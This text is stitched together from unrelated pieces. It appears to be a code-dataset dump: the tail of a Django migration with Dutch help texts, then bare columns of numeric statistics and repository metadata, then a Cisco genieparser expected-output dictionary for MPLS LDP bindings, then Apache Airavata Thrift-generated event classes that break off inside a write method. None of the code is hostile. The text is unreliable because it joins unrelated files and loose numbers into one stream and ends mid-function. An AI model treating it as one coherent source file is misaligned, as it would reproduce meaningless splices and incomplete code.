model_name='news',
name='pub_date',
field=models.DateTimeField(default=datetime.datetime(2015, 11, 5, 23, 33, 46, 978172), verbose_name=b'publicatie datum', auto_now_add=True),
preserve_default=False,
),
migrations.AlterField(
model_name='page',
name='description',
field=models.TextField(help_text=b'\n Maximaal 250 karakters (Google zoekresultaten geven alleen de eerste 150 \n karakters weer).<br>\n Maak een relevante description. Bij voorkeur met tekst die op de pagina \n voorkomt.</br>\n Bij een leeg descriptionveld wordt description gegenereerd op basis van de \n inhoud van het tekstveld.\n ', max_length=250, blank=True),
),
migrations.AlterField(
model_name='page',
name='html',
field=models.TextField(default='', verbose_name=b'html', editable=False, blank=True),
preserve_default=False,
),
migrations.AlterField(
model_name='page',
name='image',
field=models.ForeignKey(related_name='page_image', blank=True, to='webapp.Image', help_text=b'\n Deze afbeelding komt op een vaste positie. Gebruik het afbeeldings-icoon\n in de text-editor om afbeeldingen tussen de lopende tekst in te voegen.\n ', null=True, verbose_name=b'afbeelding'),
),
migrations.AlterField(
model_name='page',
name='keywords',
field=models.TextField(help_text=b"\n Alleen relevante keywords. Niet relevante keywords (die niet in de tekst \n voorkomen) doen pagina's zakken.<br>\n Bij een leeg keywordveld worden keywords gegenereerd op basis van de \n inhoud van het tekstveld.\n ", blank=True),
),
migrations.AlterField(
model_name='page',
name='last_modified',
field=models.DateTimeField(default=datetime.datetime(2015, 11, 5, 23, 34, 1, 387628), verbose_name=b'laatst bewerkt', auto_now=True),
preserve_default=False,
),
migrations.AlterField(
model_name='page',
name='owner',
field=models.ForeignKey(related_name='page_owner', verbose_name=b'gemaakt door', blank=True, to=settings.AUTH_USER_MODEL, null=True),
),
migrations.AlterField(
model_name='page',
name='pub_date',
field=models.DateTimeField(default=datetime.datetime(2015, 11, 5, 23, 34, 6, 421516), verbose_name=b'publicatie datum', auto_now_add=True),
preserve_default=False,
),
migrations.AlterField(
model_name='page',
name='table_of_contents',
field=models.TextField(default='', verbose_name=b'table of contents', editable=False, blank=True),
preserve_default=False,
),
]
| 56.509434
| 399
| 0.63172
| 1,082
| 8,985
| 5.134011
| 0.166359
| 0.093609
| 0.117012
| 0.135734
| 0.888209
| 0.888209
| 0.865527
| 0.814221
| 0.80162
| 0.79892
| 0
| 0.030471
| 0.258542
| 8,985
| 158
| 400
| 56.867089
| 0.803362
| 0.002337
| 0
| 0.789474
| 0
| 0.065789
| 0.34981
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.026316
| 0
| 0.046053
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
876a5496ed7710173490ea5fd3e9b6aaeccf3cb8
| 2,210
|
py
|
Python
|
src/genie/libs/parser/iosxe/tests/ShowMplsLdpBindings/cli/equal/golden_output_all_expected.py
|
balmasea/genieparser
|
d1e71a96dfb081e0a8591707b9d4872decd5d9d3
|
[
"Apache-2.0"
] | 204
|
2018-06-27T00:55:27.000Z
|
2022-03-06T21:12:18.000Z
|
src/genie/libs/parser/iosxe/tests/ShowMplsLdpBindings/cli/equal/golden_output_all_expected.py
|
balmasea/genieparser
|
d1e71a96dfb081e0a8591707b9d4872decd5d9d3
|
[
"Apache-2.0"
] | 468
|
2018-06-19T00:33:18.000Z
|
2022-03-31T23:23:35.000Z
|
src/genie/libs/parser/iosxe/tests/ShowMplsLdpBindings/cli/equal/golden_output_all_expected.py
|
balmasea/genieparser
|
d1e71a96dfb081e0a8591707b9d4872decd5d9d3
|
[
"Apache-2.0"
] | 309
|
2019-01-16T20:21:07.000Z
|
2022-03-30T12:56:41.000Z
|
expected_output = {
"vrf": {
"vrf1": {
"lib_entry": {
"10.11.0.0/24": {
"rev": "7",
"remote_binding": {
"label": {
"imp-null": {
"lsr_id": {"10.132.0.1": {"label_space_id": {0: {}}}}
}
}
},
},
"10.12.0.0/24": {
"label_binding": {"label": {"17": {}}},
"rev": "8",
"remote_binding": {
"label": {
"imp-null": {
"lsr_id": {"10.132.0.1": {"label_space_id": {0: {}}}}
}
}
},
},
"10.0.0.0/24": {
"rev": "6",
"remote_binding": {
"label": {
"imp-null": {
"lsr_id": {"10.132.0.1": {"label_space_id": {0: {}}}}
}
}
},
},
}
},
"default": {
"lib_entry": {
"10.11.0.0/24": {
"label_binding": {"label": {"imp-null": {}}},
"rev": "15",
"remote_binding": {
"label": {
"imp-null": {
"lsr_id": {"10.131.0.1": {"label_space_id": {0: {}}}}
}
}
},
},
"10.0.0.0/24": {
"label_binding": {"label": {"imp-null": {}}},
"rev": "4",
"remote_binding": {
"label": {
"imp-null": {
"lsr_id": {"10.131.0.1": {"label_space_id": {0: {}}}}
}
}
},
},
}
},
}
}
| 33.484848
| 85
| 0.20181
| 133
| 2,210
| 3.157895
| 0.225564
| 0.228571
| 0.25
| 0.316667
| 0.888095
| 0.888095
| 0.838095
| 0.771429
| 0.771429
| 0.633333
| 0
| 0.109296
| 0.639819
| 2,210
| 65
| 86
| 34
| 0.418342
| 0
| 0
| 0.430769
| 0
| 0
| 0.211765
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 11
|
0d6dac6dd4e3fcecb313fd637676d52617067daf
| 53,180
|
py
|
Python
|
airavata-api/airavata-client-sdks/airavata-python-sdk/airavata/model/messaging/event/ttypes.py
|
docquantum/airavata
|
4ec5fa0aab1b75ca1e98a16648c57cd8abdb4b9c
|
[
"ECL-2.0",
"Apache-2.0"
] | 74
|
2015-04-10T02:57:26.000Z
|
2022-02-28T16:10:03.000Z
|
airavata-api/airavata-client-sdks/airavata-python-sdk/airavata/model/messaging/event/ttypes.py
|
docquantum/airavata
|
4ec5fa0aab1b75ca1e98a16648c57cd8abdb4b9c
|
[
"ECL-2.0",
"Apache-2.0"
] | 126
|
2015-04-26T02:55:26.000Z
|
2022-02-16T22:43:28.000Z
|
airavata-api/airavata-client-sdks/airavata-python-sdk/airavata/model/messaging/event/ttypes.py
|
docquantum/airavata
|
4ec5fa0aab1b75ca1e98a16648c57cd8abdb4b9c
|
[
"ECL-2.0",
"Apache-2.0"
] | 163
|
2015-01-22T14:05:24.000Z
|
2022-03-17T12:24:34.000Z
|
#
# Autogenerated by Thrift Compiler (0.10.0)
#
# DO NOT EDIT UNLESS YOU ARE SURE THAT YOU KNOW WHAT YOU ARE DOING
#
# options string: py
#
from thrift.Thrift import TType, TMessageType, TFrozenDict, TException, TApplicationException
from thrift.protocol.TProtocol import TProtocolException
import sys
import airavata.model.status.ttypes
import airavata.model.application.io.ttypes
import airavata.model.commons.ttypes
from thrift.transport import TTransport
class MessageLevel(object):
INFO = 0
DEBUG = 1
ERROR = 2
ACK = 3
_VALUES_TO_NAMES = {
0: "INFO",
1: "DEBUG",
2: "ERROR",
3: "ACK",
}
_NAMES_TO_VALUES = {
"INFO": 0,
"DEBUG": 1,
"ERROR": 2,
"ACK": 3,
}
class MessageType(object):
EXPERIMENT = 0
EXPERIMENT_CANCEL = 1
TASK = 2
PROCESS = 3
JOB = 4
LAUNCHPROCESS = 5
TERMINATEPROCESS = 6
PROCESSOUTPUT = 7
DB_EVENT = 8
_VALUES_TO_NAMES = {
0: "EXPERIMENT",
1: "EXPERIMENT_CANCEL",
2: "TASK",
3: "PROCESS",
4: "JOB",
5: "LAUNCHPROCESS",
6: "TERMINATEPROCESS",
7: "PROCESSOUTPUT",
8: "DB_EVENT",
}
_NAMES_TO_VALUES = {
"EXPERIMENT": 0,
"EXPERIMENT_CANCEL": 1,
"TASK": 2,
"PROCESS": 3,
"JOB": 4,
"LAUNCHPROCESS": 5,
"TERMINATEPROCESS": 6,
"PROCESSOUTPUT": 7,
"DB_EVENT": 8,
}
class ExperimentStatusChangeEvent(object):
"""
Attributes:
- state
- experimentId
- gatewayId
"""
thrift_spec = (
None, # 0
(1, TType.I32, 'state', None, None, ), # 1
(2, TType.STRING, 'experimentId', 'UTF8', None, ), # 2
(3, TType.STRING, 'gatewayId', 'UTF8', None, ), # 3
)
def __init__(self, state=None, experimentId=None, gatewayId=None,):
self.state = state
self.experimentId = experimentId
self.gatewayId = gatewayId
def read(self, iprot):
if iprot._fast_decode is not None and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None:
iprot._fast_decode(self, iprot, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 1:
if ftype == TType.I32:
self.state = iprot.readI32()
else:
iprot.skip(ftype)
elif fid == 2:
if ftype == TType.STRING:
self.experimentId = iprot.readString().decode('utf-8') if sys.version_info[0] == 2 else iprot.readString()
else:
iprot.skip(ftype)
elif fid == 3:
if ftype == TType.STRING:
self.gatewayId = iprot.readString().decode('utf-8') if sys.version_info[0] == 2 else iprot.readString()
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot._fast_encode is not None and self.thrift_spec is not None:
oprot.trans.write(oprot._fast_encode(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('ExperimentStatusChangeEvent')
if self.state is not None:
oprot.writeFieldBegin('state', TType.I32, 1)
oprot.writeI32(self.state)
oprot.writeFieldEnd()
if self.experimentId is not None:
oprot.writeFieldBegin('experimentId', TType.STRING, 2)
oprot.writeString(self.experimentId.encode('utf-8') if sys.version_info[0] == 2 else self.experimentId)
oprot.writeFieldEnd()
if self.gatewayId is not None:
oprot.writeFieldBegin('gatewayId', TType.STRING, 3)
oprot.writeString(self.gatewayId.encode('utf-8') if sys.version_info[0] == 2 else self.gatewayId)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
if self.state is None:
raise TProtocolException(message='Required field state is unset!')
if self.experimentId is None:
raise TProtocolException(message='Required field experimentId is unset!')
if self.gatewayId is None:
raise TProtocolException(message='Required field gatewayId is unset!')
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.items()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class ProcessIdentifier(object):
"""
Attributes:
- processId
- experimentId
- gatewayId
"""
thrift_spec = (
None, # 0
(1, TType.STRING, 'processId', 'UTF8', None, ), # 1
(2, TType.STRING, 'experimentId', 'UTF8', None, ), # 2
(3, TType.STRING, 'gatewayId', 'UTF8', None, ), # 3
)
def __init__(self, processId=None, experimentId=None, gatewayId=None,):
self.processId = processId
self.experimentId = experimentId
self.gatewayId = gatewayId
def read(self, iprot):
if iprot._fast_decode is not None and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None:
iprot._fast_decode(self, iprot, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 1:
if ftype == TType.STRING:
self.processId = iprot.readString().decode('utf-8') if sys.version_info[0] == 2 else iprot.readString()
else:
iprot.skip(ftype)
elif fid == 2:
if ftype == TType.STRING:
self.experimentId = iprot.readString().decode('utf-8') if sys.version_info[0] == 2 else iprot.readString()
else:
iprot.skip(ftype)
elif fid == 3:
if ftype == TType.STRING:
self.gatewayId = iprot.readString().decode('utf-8') if sys.version_info[0] == 2 else iprot.readString()
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot._fast_encode is not None and self.thrift_spec is not None:
oprot.trans.write(oprot._fast_encode(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('ProcessIdentifier')
if self.processId is not None:
oprot.writeFieldBegin('processId', TType.STRING, 1)
oprot.writeString(self.processId.encode('utf-8') if sys.version_info[0] == 2 else self.processId)
oprot.writeFieldEnd()
if self.experimentId is not None:
oprot.writeFieldBegin('experimentId', TType.STRING, 2)
oprot.writeString(self.experimentId.encode('utf-8') if sys.version_info[0] == 2 else self.experimentId)
oprot.writeFieldEnd()
if self.gatewayId is not None:
oprot.writeFieldBegin('gatewayId', TType.STRING, 3)
oprot.writeString(self.gatewayId.encode('utf-8') if sys.version_info[0] == 2 else self.gatewayId)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
if self.processId is None:
raise TProtocolException(message='Required field processId is unset!')
if self.experimentId is None:
raise TProtocolException(message='Required field experimentId is unset!')
if self.gatewayId is None:
raise TProtocolException(message='Required field gatewayId is unset!')
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.items()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class TaskIdentifier(object):
"""
Attributes:
- taskId
- processId
- experimentId
- gatewayId
"""
thrift_spec = (
None, # 0
(1, TType.STRING, 'taskId', 'UTF8', None, ), # 1
(2, TType.STRING, 'processId', 'UTF8', None, ), # 2
(3, TType.STRING, 'experimentId', 'UTF8', None, ), # 3
(4, TType.STRING, 'gatewayId', 'UTF8', None, ), # 4
)
def __init__(self, taskId=None, processId=None, experimentId=None, gatewayId=None,):
self.taskId = taskId
self.processId = processId
self.experimentId = experimentId
self.gatewayId = gatewayId
def read(self, iprot):
if iprot._fast_decode is not None and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None:
iprot._fast_decode(self, iprot, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 1:
if ftype == TType.STRING:
self.taskId = iprot.readString().decode('utf-8') if sys.version_info[0] == 2 else iprot.readString()
else:
iprot.skip(ftype)
elif fid == 2:
if ftype == TType.STRING:
self.processId = iprot.readString().decode('utf-8') if sys.version_info[0] == 2 else iprot.readString()
else:
iprot.skip(ftype)
elif fid == 3:
if ftype == TType.STRING:
self.experimentId = iprot.readString().decode('utf-8') if sys.version_info[0] == 2 else iprot.readString()
else:
iprot.skip(ftype)
elif fid == 4:
if ftype == TType.STRING:
self.gatewayId = iprot.readString().decode('utf-8') if sys.version_info[0] == 2 else iprot.readString()
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot._fast_encode is not None and self.thrift_spec is not None:
oprot.trans.write(oprot._fast_encode(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('TaskIdentifier')
if self.taskId is not None:
oprot.writeFieldBegin('taskId', TType.STRING, 1)
oprot.writeString(self.taskId.encode('utf-8') if sys.version_info[0] == 2 else self.taskId)
oprot.writeFieldEnd()
if self.processId is not None:
oprot.writeFieldBegin('processId', TType.STRING, 2)
oprot.writeString(self.processId.encode('utf-8') if sys.version_info[0] == 2 else self.processId)
oprot.writeFieldEnd()
if self.experimentId is not None:
oprot.writeFieldBegin('experimentId', TType.STRING, 3)
oprot.writeString(self.experimentId.encode('utf-8') if sys.version_info[0] == 2 else self.experimentId)
oprot.writeFieldEnd()
if self.gatewayId is not None:
oprot.writeFieldBegin('gatewayId', TType.STRING, 4)
oprot.writeString(self.gatewayId.encode('utf-8') if sys.version_info[0] == 2 else self.gatewayId)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
if self.taskId is None:
raise TProtocolException(message='Required field taskId is unset!')
if self.processId is None:
raise TProtocolException(message='Required field processId is unset!')
if self.experimentId is None:
raise TProtocolException(message='Required field experimentId is unset!')
if self.gatewayId is None:
raise TProtocolException(message='Required field gatewayId is unset!')
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.items()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class TaskStatusChangeEvent(object):
"""
Attributes:
- state
- taskIdentity
"""
thrift_spec = (
None, # 0
(1, TType.I32, 'state', None, None, ), # 1
(2, TType.STRUCT, 'taskIdentity', (TaskIdentifier, TaskIdentifier.thrift_spec), None, ), # 2
)
def __init__(self, state=None, taskIdentity=None,):
self.state = state
self.taskIdentity = taskIdentity
def read(self, iprot):
if iprot._fast_decode is not None and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None:
iprot._fast_decode(self, iprot, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 1:
if ftype == TType.I32:
self.state = iprot.readI32()
else:
iprot.skip(ftype)
elif fid == 2:
if ftype == TType.STRUCT:
self.taskIdentity = TaskIdentifier()
self.taskIdentity.read(iprot)
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot._fast_encode is not None and self.thrift_spec is not None:
oprot.trans.write(oprot._fast_encode(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('TaskStatusChangeEvent')
if self.state is not None:
oprot.writeFieldBegin('state', TType.I32, 1)
oprot.writeI32(self.state)
oprot.writeFieldEnd()
if self.taskIdentity is not None:
oprot.writeFieldBegin('taskIdentity', TType.STRUCT, 2)
self.taskIdentity.write(oprot)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
if self.state is None:
raise TProtocolException(message='Required field state is unset!')
if self.taskIdentity is None:
raise TProtocolException(message='Required field taskIdentity is unset!')
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.items()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class TaskStatusChangeRequestEvent(object):
"""
Attributes:
- state
- taskIdentity
"""
thrift_spec = (
None, # 0
(1, TType.I32, 'state', None, None, ), # 1
(2, TType.STRUCT, 'taskIdentity', (TaskIdentifier, TaskIdentifier.thrift_spec), None, ), # 2
)
def __init__(self, state=None, taskIdentity=None,):
self.state = state
self.taskIdentity = taskIdentity
def read(self, iprot):
if iprot._fast_decode is not None and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None:
iprot._fast_decode(self, iprot, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 1:
if ftype == TType.I32:
self.state = iprot.readI32()
else:
iprot.skip(ftype)
elif fid == 2:
if ftype == TType.STRUCT:
self.taskIdentity = TaskIdentifier()
self.taskIdentity.read(iprot)
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot._fast_encode is not None and self.thrift_spec is not None:
oprot.trans.write(oprot._fast_encode(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('TaskStatusChangeRequestEvent')
if self.state is not None:
oprot.writeFieldBegin('state', TType.I32, 1)
oprot.writeI32(self.state)
oprot.writeFieldEnd()
if self.taskIdentity is not None:
oprot.writeFieldBegin('taskIdentity', TType.STRUCT, 2)
self.taskIdentity.write(oprot)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
if self.state is None:
raise TProtocolException(message='Required field state is unset!')
if self.taskIdentity is None:
raise TProtocolException(message='Required field taskIdentity is unset!')
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.items()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class ProcessStatusChangeEvent(object):
"""
Attributes:
- state
- processIdentity
"""
thrift_spec = (
None, # 0
(1, TType.I32, 'state', None, None, ), # 1
(2, TType.STRUCT, 'processIdentity', (ProcessIdentifier, ProcessIdentifier.thrift_spec), None, ), # 2
)
def __init__(self, state=None, processIdentity=None,):
self.state = state
self.processIdentity = processIdentity
def read(self, iprot):
if iprot._fast_decode is not None and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None:
iprot._fast_decode(self, iprot, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 1:
if ftype == TType.I32:
self.state = iprot.readI32()
else:
iprot.skip(ftype)
elif fid == 2:
if ftype == TType.STRUCT:
self.processIdentity = ProcessIdentifier()
self.processIdentity.read(iprot)
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot._fast_encode is not None and self.thrift_spec is not None:
oprot.trans.write(oprot._fast_encode(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('ProcessStatusChangeEvent')
if self.state is not None:
oprot.writeFieldBegin('state', TType.I32, 1)
oprot.writeI32(self.state)
oprot.writeFieldEnd()
if self.processIdentity is not None:
oprot.writeFieldBegin('processIdentity', TType.STRUCT, 2)
self.processIdentity.write(oprot)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
if self.state is None:
raise TProtocolException(message='Required field state is unset!')
if self.processIdentity is None:
raise TProtocolException(message='Required field processIdentity is unset!')
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.items()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class ProcessStatusChangeRequestEvent(object):
"""
Attributes:
- state
- processIdentity
"""
thrift_spec = (
None, # 0
(1, TType.I32, 'state', None, None, ), # 1
(2, TType.STRUCT, 'processIdentity', (ProcessIdentifier, ProcessIdentifier.thrift_spec), None, ), # 2
)
def __init__(self, state=None, processIdentity=None,):
self.state = state
self.processIdentity = processIdentity
def read(self, iprot):
if iprot._fast_decode is not None and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None:
iprot._fast_decode(self, iprot, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 1:
if ftype == TType.I32:
self.state = iprot.readI32()
else:
iprot.skip(ftype)
elif fid == 2:
if ftype == TType.STRUCT:
self.processIdentity = ProcessIdentifier()
self.processIdentity.read(iprot)
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot._fast_encode is not None and self.thrift_spec is not None:
oprot.trans.write(oprot._fast_encode(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('ProcessStatusChangeRequestEvent')
if self.state is not None:
oprot.writeFieldBegin('state', TType.I32, 1)
oprot.writeI32(self.state)
oprot.writeFieldEnd()
if self.processIdentity is not None:
oprot.writeFieldBegin('processIdentity', TType.STRUCT, 2)
self.processIdentity.write(oprot)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
if self.state is None:
raise TProtocolException(message='Required field state is unset!')
if self.processIdentity is None:
raise TProtocolException(message='Required field processIdentity is unset!')
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.items()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class TaskOutputChangeEvent(object):
"""
Attributes:
- output
- taskIdentity
"""
thrift_spec = (
None, # 0
(1, TType.LIST, 'output', (TType.STRUCT, (airavata.model.application.io.ttypes.OutputDataObjectType, airavata.model.application.io.ttypes.OutputDataObjectType.thrift_spec), False), None, ), # 1
(2, TType.STRUCT, 'taskIdentity', (TaskIdentifier, TaskIdentifier.thrift_spec), None, ), # 2
)
def __init__(self, output=None, taskIdentity=None,):
self.output = output
self.taskIdentity = taskIdentity
def read(self, iprot):
if iprot._fast_decode is not None and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None:
iprot._fast_decode(self, iprot, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 1:
if ftype == TType.LIST:
self.output = []
(_etype3, _size0) = iprot.readListBegin()
for _i4 in range(_size0):
_elem5 = airavata.model.application.io.ttypes.OutputDataObjectType()
_elem5.read(iprot)
self.output.append(_elem5)
iprot.readListEnd()
else:
iprot.skip(ftype)
elif fid == 2:
if ftype == TType.STRUCT:
self.taskIdentity = TaskIdentifier()
self.taskIdentity.read(iprot)
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot._fast_encode is not None and self.thrift_spec is not None:
oprot.trans.write(oprot._fast_encode(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('TaskOutputChangeEvent')
if self.output is not None:
oprot.writeFieldBegin('output', TType.LIST, 1)
oprot.writeListBegin(TType.STRUCT, len(self.output))
for iter6 in self.output:
iter6.write(oprot)
oprot.writeListEnd()
oprot.writeFieldEnd()
if self.taskIdentity is not None:
oprot.writeFieldBegin('taskIdentity', TType.STRUCT, 2)
self.taskIdentity.write(oprot)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
if self.output is None:
raise TProtocolException(message='Required field output is unset!')
if self.taskIdentity is None:
raise TProtocolException(message='Required field taskIdentity is unset!')
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.items()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class JobIdentifier(object):
    """Thrift struct that fully qualifies a job in the Airavata hierarchy.

    All five identifiers are required; validate() rejects an instance with
    any field left unset.

    Attributes:
     - jobId
     - taskId
     - processId
     - experimentId
     - gatewayId
    """

    # (field id, wire type, name, encoding, default) tuples consumed by the
    # accelerated C encoder/decoder; slot 0 is unused by Thrift.
    thrift_spec = (
        None,  # 0
        (1, TType.STRING, 'jobId', 'UTF8', None, ),  # 1
        (2, TType.STRING, 'taskId', 'UTF8', None, ),  # 2
        (3, TType.STRING, 'processId', 'UTF8', None, ),  # 3
        (4, TType.STRING, 'experimentId', 'UTF8', None, ),  # 4
        (5, TType.STRING, 'gatewayId', 'UTF8', None, ),  # 5
    )

    def __init__(self, jobId=None, taskId=None, processId=None, experimentId=None, gatewayId=None,):
        self.jobId = jobId
        self.taskId = taskId
        self.processId = processId
        self.experimentId = experimentId
        self.gatewayId = gatewayId

    def read(self, iprot):
        """Deserialize this struct in place from the input protocol *iprot*."""
        # Fast path: delegate to the C decoder when the transport supports it.
        if iprot._fast_decode is not None and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None:
            iprot._fast_decode(self, iprot, (self.__class__, self.thrift_spec))
            return
        # Slow path: consume fields until STOP, skipping unknown or
        # mistyped fields for forward compatibility.
        iprot.readStructBegin()
        while True:
            (fname, ftype, fid) = iprot.readFieldBegin()
            if ftype == TType.STOP:
                break
            if fid == 1:
                if ftype == TType.STRING:
                    self.jobId = iprot.readString().decode('utf-8') if sys.version_info[0] == 2 else iprot.readString()
                else:
                    iprot.skip(ftype)
            elif fid == 2:
                if ftype == TType.STRING:
                    self.taskId = iprot.readString().decode('utf-8') if sys.version_info[0] == 2 else iprot.readString()
                else:
                    iprot.skip(ftype)
            elif fid == 3:
                if ftype == TType.STRING:
                    self.processId = iprot.readString().decode('utf-8') if sys.version_info[0] == 2 else iprot.readString()
                else:
                    iprot.skip(ftype)
            elif fid == 4:
                if ftype == TType.STRING:
                    self.experimentId = iprot.readString().decode('utf-8') if sys.version_info[0] == 2 else iprot.readString()
                else:
                    iprot.skip(ftype)
            elif fid == 5:
                if ftype == TType.STRING:
                    self.gatewayId = iprot.readString().decode('utf-8') if sys.version_info[0] == 2 else iprot.readString()
                else:
                    iprot.skip(ftype)
            else:
                iprot.skip(ftype)
            iprot.readFieldEnd()
        iprot.readStructEnd()

    def write(self, oprot):
        """Serialize this struct to the output protocol *oprot*."""
        # Fast path: the C extension encodes straight from thrift_spec.
        if oprot._fast_encode is not None and self.thrift_spec is not None:
            oprot.trans.write(oprot._fast_encode(self, (self.__class__, self.thrift_spec)))
            return
        oprot.writeStructBegin('JobIdentifier')
        # Unset (None) fields are omitted from the wire entirely.
        if self.jobId is not None:
            oprot.writeFieldBegin('jobId', TType.STRING, 1)
            oprot.writeString(self.jobId.encode('utf-8') if sys.version_info[0] == 2 else self.jobId)
            oprot.writeFieldEnd()
        if self.taskId is not None:
            oprot.writeFieldBegin('taskId', TType.STRING, 2)
            oprot.writeString(self.taskId.encode('utf-8') if sys.version_info[0] == 2 else self.taskId)
            oprot.writeFieldEnd()
